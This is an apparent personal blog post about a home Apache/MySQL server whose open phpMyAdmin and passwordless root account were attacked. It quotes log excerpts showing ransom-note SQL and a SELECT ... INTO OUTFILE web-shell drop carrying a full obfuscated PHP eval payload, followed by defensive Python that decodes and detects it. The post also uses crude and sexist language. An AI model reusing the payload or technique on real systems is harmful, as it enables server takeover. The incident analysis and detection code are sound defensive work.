Fnord Since I have lots of time to spare I have rebuilt one of my old computers to run on my internal network as an SQL database and Apache2 web server. Years ago I purchased two separate "kit" computers, that is, separate chassis, motherboards, memory sticks, and extras like network cards, video cards and so on. Since I have had some hardware failures in the interim (power supply mainly) I have merged them into one chassis using an old 32-bit MSI motherboard with 3 GB of memory (a lot for that time!). I am using the Knoppix live (DVD) version of Linux, but running from the DVD was slow, so I tried installing it on a thumb drive. I could not get the system to boot from the thumb drive, so I have to start the boot from the DVD and then type in "knoppix fromhd=/dev/sda1 desktop=kde". It will continue booting and then run completely from the thumb drive. When I initially transferred the operating system to the thumb drive I partitioned it into two partitions, one for the main operating system and the other for home directories and downloads, so when I reboot I have to mount the other partition to use it. The full process is this.
Fnord As stated above, I set my timezone to Mountain time, start Network Time Protocol to sync to a reliable time source, make backup copies of the original configuration files, copy pre-edited config files to point my Apache server at the correct document root on sda2, enable the Apache server to use a PHP file as my default web page, enable SSL for my secure web page, then start the Apache2 server. I then make a backup copy of the my.cnf file and copy pre-edited config files for the MySQL primary and secondary server.
Fnord I have also been learning how to use the MySQL database software and creating some random databases to practice with. I have one major database called "publications" that contains most of the books I have in various bookshelves in my house. I started with just one table in the database called 'classics' which contained the fields 'author', 'title', 'category', 'year' (year of publication), and 'ISBN' (International Standard Book Number). I now have over 200 books in the database. I also monitored my Apache web server logs and noticed that there was a lot of activity, either GET requests to my Document Root or GET requests to /phpmyadmin/index.php. phpMyAdmin is a web interface to your MySQL database and is enabled by default in Knoppix. The MySQL server also comes with no password on the root account, so it's wide open: with phpMyAdmin reachable from the network and no root password, anyone who finds the URL has full control of every database. One day I tried to access the publications database and found it was gone. I went through my Apache logs (access.log) and found someone had accessed the database and deleted it, and in its place was a database called 'PLEASE_READ_ME_VVV'; when I looked at it there was a ransom note demanding 0.03 bitcoin for the return of the database. I checked the MySQL logs carefully and noticed the hacker/thief had checked for databases and just deleted the large databases but never copied or downloaded them. After I got through laughing my ass off I restored the database from a backup I had created some weeks earlier. Just imagine, cyber-ransom on my home computer... what the fuck did they think I had, classified information from the government? It's just a bunch of books, you dumbasses! I did an 'nslookup' on the IP address and found the cyber-terrorists were from Sweden.
Fnord I am sorry, but I seem to have gotten off track. I noticed that the same cyber-weenis came back several times in the next few weeks and stole the database again, leaving the same demand. I laugh my ass off each time as I restore from a backup. I have also had other 'cyber-terrorists', or 'script kiddies' as they're mostly referred to, also try to steal my databases. It's funny, as they sometimes do it several times a day and delete the last ransom note left and install their own. Those fucking idiots are hacking all over each other. If I could find out their phone numbers I'd call their mothers and say 'Get that kid into internet porn or something so they don't make cyber-fools of themselves, it's really pathetic; if they run into the Russian cyber crime syndicate they could get their dicks slapped, fer chrissakes'. Hell, if I'm lucky it's Liz Salander trying to hack me. That would be a real kicker, a fictional character trying to hack me!
I just looked up "Exports from Sweden" and found Sweden's main exports seem to be industrial machinery, automobiles, paper products, iron and steel products, and books about Lisbeth Salander, the protagonist of the Millennium series, and in one memorable year in Palo Alto, CA it was Swedish nannies in their early to mid twenties (man, they were real fuckin' FOXY!).
The command I use to get the bitcoin address and e-mail address is
perl -e 'while(<>) {if(m/bitcoin\b.*?\b(\w{26,34})\b.*?\b([\w.+-]+@[\w.-]+\.\w+)\b/i) {print "$1 $2\n";}}' mysql.log
The series of SQL commands I see in my log to issue the ransom demands is this
191011 7:54:43 945 Connect root@185.65.135.232 on
945 Query SET AUTOCOMMIT = 0
945 Query SET FOREIGN_KEY_CHECKS=0
945 Query SHOW DATABASES
945 Query SHOW DATABASES
191011 7:54:44 945 Query GRANT ALL PRIVILEGES ON AAA_READ_THIS_MESSAGE.* TO 'root'
945 Query DROP DATABASE IF EXISTS AAA_READ_THIS_MESSAGE
191011 7:54:46 945 Query USE AAA_READ_THIS_MESSAGE
945 Query SHOW TABLES
191011 7:54:47 945 Query CREATE TABLE aaa_read_this_now (message VARCHAR(9999))
191011 7:54:49 945 Query INSERT INTO aaa_read_this_now(message) VALUES ('Hello. You may be surprised to see this message, but it was your bad security practices that allowed us to steal your database. If you want to restore your data, and continue using it, send 0.1 Bitcoin to 1A8kD5474D2EkzfmRhBMLWadEMTzK24GoG, and email us at recovery@yoursqldumps.com with your database IP address and transaction hash. In return, you will get the copy we have of your database.')
945 Query CREATE DATABASE IF NOT EXISTS AAA_READ_THIS_MESSAGE
945 Query SHOW WARNINGS
191011 7:54:50 945 Query USE AAA_READ_THIS_MESSAGE
945 Query CREATE TABLE aaa_read_this_now (message VARCHAR(9999))
This entry was found in access.log. The first and second entries show the attacker logging into phpMyAdmin as root; the line shown below is then repeated 40 times, each entry identical except that the User-Agent differs each time and the corresponding INTO OUTFILE in the MySQL log names a different target path each time. Because the attacker doesn't know which platform the server is running, they try to write the file to both Linux and Windows web-root locations in different directories.
185.61.149.22 - - [13/Oct/2019:02:46:36 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 2551 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1"
This is taken from mysql.log; it is what that POST to import.php produced on the database side:
191013 2:46:36 1108 Connect phpmyadmin@localhost on
1109 Connect root@localhost on
1109 Query SET CHARACTER SET 'utf8mb4'
1109 Query SET collation_connection = 'utf8mb4_general_ci'
1109 Query SELECT "<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP6cVfkPgy862xKQhOOAWOK0SBsKKgJRTyuVO0yOvY5d/NbdNYHe8d87u3gntoHr6Yo/EGl05tl0c2lz51RTGAvTxHPcodwwVNB2E1dGd0aSpZSHydLom6NBu9PuOjkP7MxuDCzQDvcHh/2jo8Fe3+/vHWv9vf7gUH//8PDgwNnzPeeDJpA6ej9CXI74kNEw4XTpMlkMEz5q2i3iBil142AwOUI5HKds4o17uNJTG242mQcEKPk7J4wTD66vzmDlMFXQwhcWgMg8CBkwT+8I3R33shpAQHhYx/Mo+jv5KWZcBJ5WI2M4dbvQtXTTq9+nSjf6yXx+dp9czOb6J9gFDS4xDmPUH/dXZgEJ+BWojD9RpLEZJkzO4TPEDlKXh/3RwmRil0dj3mTTKKXDN77vjxYp9QgdDrJ7YHYUbSBq4bFkT++5I8YuVjihzV0/pTHEhAepdHIp41q5b8YfMm+JXK6QASRBrEla5Z5Am4x7laNN5D7k+Pso0hv6YISMEWFn7V+n8xt9FRL9k6ky3GgoxauCf50HUFsFqQbWpEuiuKWlzBYny+0syOxcrAyd6ea2lMu1jSmSNzRZ/LSpbSdIBeGWFnBBw4TYwrWmXlxP3hKakKgppqVrvdfQKMQhO9hfhFwKL0Iu7dPzuT07/WYKlnLBPvwAvhMxAlDgNCd1borKdlaCLUwAxl8MPSGJm23EEPExSHqtgwoEAZ5R9TZkojKswtmum8YehrYmrnQuo3GCaiHhwMJ/iPUO5K2z3vTlN9Hwc7OAUZFa7ol4VUBG3GmR8oRwygVALd9CqF1vidzoLF/EId8kPc+iFAslFKnPSZ5uFryE5UlKUUYSSsYJTIkdtC5dk+6ttY5Cz6azGz3H8vbDCPXQUeoXoI/qJ0HviK0OJp4tNI10emyc2cp+GypRatWJSKavhEtmWHLmTSrBsYMIXkxhKrgvKs9l18XGAxy3BPaTg3GfGv4C2iYujTo1tsq0zaaz2enF+VrsvTeeem3mJ9gQVFgSdPzB2LR/E758KWLBOpNPINL49i0GQiLX97FAKgj1wHwbJ1hJlWtJno9L9YUR9/ax8L0oCB5leaHXyWJWuldgB+I8YDy8HfeUYLxD7a3r5tQWGRaPnCGivSTcxlqKLUMKDEwnpkNet9yyzPbKMjuSH6JBrgXWEPLQswq0+AEXEnJmmMjfsqqyfEFy3FusiX7T2fJhDOWlqTSzJkf1mRYV23av+8xXtBkk5DYquZvjPuOU4hNwCLV60HttPa2F3pZHjFUi9VkM/aCmJj5Xa0ETaN6uQBp65EIz3bCo6mH+rUjWWJQ/fnw1zgj1baTVj6pemXW99q54orY0Y3HOLFqbfP0a/JzGsSPGK5Xy6gigZGWP75kcADQ39rS6Zyab+02uYzS4ZqJcrmJEX80I+qjOFN84BRHnEQ8zHC6l3o7nY6dxXrojvPkPF8quiVpGukS8RQ1igtDzVUWwSA9G3SHRtgtk2cW14swjhfZIFudxJa2HQyVEwRfRR9aD98U5xROngRtu57O4RjNDJAuZtuDr2CqHeOGtj1uqvRYpqQ8HxXlDdcTe/50NXhoNNpe8JZhuxfA0zzJ5kegWrgwxI13MtqG/De9ZRkFW+h+n57oaFU3fUlTHdEJ/bkepEPpB8IjBQeS8iI8+/ws=')))); ?>" INTO OUTFILE 'd:/xampp/htdocs/2A507B9AC22677AE88CFADF55E01C9B3.php'
1109 Query SHOW VARIABLES LIKE 'language'
1109 Quit
1108 Quit
As the SELECT statement above shows, the goal is to use INTO OUTFILE to write a PHP file named 2A---9B3.php into the web root; once that is done, the GET request shown below (also taken from access.log) fetches it. Here it returned 404: that particular write targeted a Windows XAMPP path (d:/xampp/htdocs/...) that does not exist on a Linux host, so nothing landed in the document root. Whether any of the other attempts could succeed depends on whether the mysqld process is allowed to write into the Apache document root and on MySQL's secure_file_priv setting, which restricts where INTO OUTFILE may write; both are worth checking on a server that has been hit this way.
185.61.149.22 - - [13/Oct/2019:02:46:36 -0600] "GET /2A507B9AC22677AE88CFADF55E01C9B3.php HTTP/1.1" 404 528 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.2.6)"
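The sequence above (a SELECT ... INTO OUTFILE carrying a layered PHP payload, followed by an HTTP request for the dropped file) is easy to hunt for in the two logs. The following is an added example, not code from the original post: it pulls INTO OUTFILE writes out of MySQL general-log text, unwraps the eval(gzinflate(str_rot13(base64_decode(...)))) layers in the same order PHP would, and checks Apache access-log lines for fetches of the dropped file's name. The log lines, the stand-in payload, the file name DEADBEEF.php and the IP 192.0.2.10 are all constructed here, and the code assumes one statement per general-log line.

```python
"""Added example, not code from the original post: find SELECT ... INTO OUTFILE
writes in a MySQL general log, unwrap an eval(gzinflate(str_rot13(base64_decode(...))))
PHP payload, and check the Apache access log for fetches of the dropped file.
All sample data below is constructed; file names and the IP are assumptions."""
import base64
import posixpath
import re
import zlib

# PHP's str_rot13 rotates only ASCII letters and is its own inverse, so one
# byte-level translation table serves both encode and decode.
_ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)


def php_decode_chain(blob: str) -> bytes:
    """What PHP evaluates: base64_decode, then str_rot13, then gzinflate.
    gzinflate is raw DEFLATE without a zlib header, hence wbits=-15."""
    raw = base64.b64decode(blob).translate(_ROT13)
    return zlib.decompress(raw, -15)


def php_encode_chain(php_source: bytes) -> str:
    """Inverse of php_decode_chain; used only to build the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(php_source) + comp.flush()
    return base64.b64encode(raw.translate(_ROT13)).decode("ascii")


# Assumes one statement per general-log line (the shape of the post's excerpt).
_OUTFILE_RE = re.compile(
    r"(?P<tid>\d+)\s+Query\s+SELECT\s+(?P<body>[^\n]*?)\s+INTO\s+OUTFILE\s+'(?P<path>[^']+)'",
    re.IGNORECASE,
)
_EVAL_RE = re.compile(
    r"eval\(gzinflate\(str_rot13\(base64_decode\('(?P<blob>[A-Za-z0-9+/=]+)'\)\)\)\)"
)
_ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)


def find_outfile_writes(log_text: str) -> list:
    """One dict per INTO OUTFILE write: thread id, target path, whether the
    written body is PHP, and the unwrapped payload when the eval chain is present."""
    hits = []
    for m in _OUTFILE_RE.finditer(log_text):
        body = m.group("body")
        hit = {"thread": m.group("tid"), "path": m.group("path"),
               "is_php": "<?php" in body.lower(), "decoded": None}
        e = _EVAL_RE.search(body)
        if e:
            try:
                hit["decoded"] = php_decode_chain(e.group("blob")).decode("utf-8", "replace")
            except (ValueError, zlib.error):
                pass  # not the expected chain; leave decoded as None
        hits.append(hit)
    return hits


def shell_fetch_status(hits: list, access_log_text: str) -> dict:
    """Map each dropped file's basename to the HTTP status codes of requests
    for it. A 200 means a write landed where Apache serves it; a 404 (as in
    the post) means that attempt missed the document root."""
    wanted = {posixpath.basename(h["path"].replace("\\", "/")): [] for h in hits}
    for line in access_log_text.splitlines():
        m = _ACCESS_RE.match(line)
        if m:
            name = posixpath.basename(m.group("uri").split("?", 1)[0])
            if name in wanted:
                wanted[name].append(m.group("status"))
    return wanted


# Constructed sample data (not taken from the post's logs).
SAMPLE_PHP = b"<?php echo 'constructed stand-in for the dropped shell'; ?>"
SAMPLE_BLOB = php_encode_chain(SAMPLE_PHP)
SAMPLE_MYSQL_LOG = (
    "191013 2:46:36 1108 Connect phpmyadmin@localhost on\n"
    "1109 Connect root@localhost on\n"
    "1109 Query SET CHARACTER SET 'utf8mb4'\n"
    "1109 Query SELECT \"<?php eval(gzinflate(str_rot13(base64_decode('"
    + SAMPLE_BLOB + "')))); ?>\" INTO OUTFILE 'd:/xampp/htdocs/DEADBEEF.php'\n"
    "1109 Query SELECT 1 INTO OUTFILE '/tmp/harmless.txt'\n"
    "1109 Quit\n"
)
SAMPLE_ACCESS_LOG = (
    '192.0.2.10 - - [13/Oct/2019:02:46:36 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 2551 "-" "Mozilla/5.0"\n'
    '192.0.2.10 - - [13/Oct/2019:02:46:36 -0600] "GET /DEADBEEF.php HTTP/1.1" 404 528 "-" "Mozilla/4.0"\n'
)

if __name__ == "__main__":
    writes = find_outfile_writes(SAMPLE_MYSQL_LOG)
    for w in writes:
        print(w["thread"], w["path"], "php" if w["is_php"] else "data", w["decoded"])
    print(shell_fetch_status(writes, SAMPLE_ACCESS_LOG))
```

Run against a real general log and access log, any INTO OUTFILE whose body contains `<?php` is a web-shell drop attempt regardless of whether the eval chain decodes, and a 200 on the fetched basename is the signal that one of the guessed paths was right.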
Executing the PHP payload carried in that SELECT statement produces a page that mimics Apache's "Not Found" response but contains one extra element: a password input styled with a white background and white border so that it blends into the page and is effectively invisible.
<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><center><form method=post><input type=password name=pass></form></center>